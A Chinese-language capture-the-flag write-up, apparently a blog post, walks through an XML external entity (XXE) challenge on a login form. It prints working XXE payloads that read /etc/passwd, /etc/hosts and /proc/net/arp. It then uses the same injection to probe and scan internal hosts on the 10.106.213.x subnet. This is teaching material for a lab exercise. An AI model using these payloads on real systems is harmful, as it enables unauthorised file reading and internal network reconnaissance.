结合本题简要讲解一下xxe攻击
本篇文章默认读者了解Xml基本格式
首先我们看到一个登录界面,使用burp抓包看一下:
这里暴露出来很明显的xxe注入点。
我们开始构造payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/passwd">
]>
<user><username>&a;</username><password>a</password></user>
可以看到回显:
说明存在xxe注入
这里很关键的一个点在于考察,xxe其实可以用来打内网。
我们读取关键文件:/etc/hosts 和 /proc/net/arp。
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/hosts">
]>
<user><username>&a;</username><password>a</password></user>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///proc/net/arp">
]>
<user><username>&a;</username><password>a</password></user>
回显分别是:
给了一个主机IP,读取一下:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.2/">
]>
<user><username>&a;</username><password>a</password></user>
直接报错,但没关系,我们可以进行C段扫描
扫描结果如下:
即:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.11/">
]>
<user><username>&a;</username><password>a</password></user>
即可
考查知识点:
xxe注入攻击
xxe内网探测
难度:
简单
总结:
保持谦虚,继续学习
扫一扫
407
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
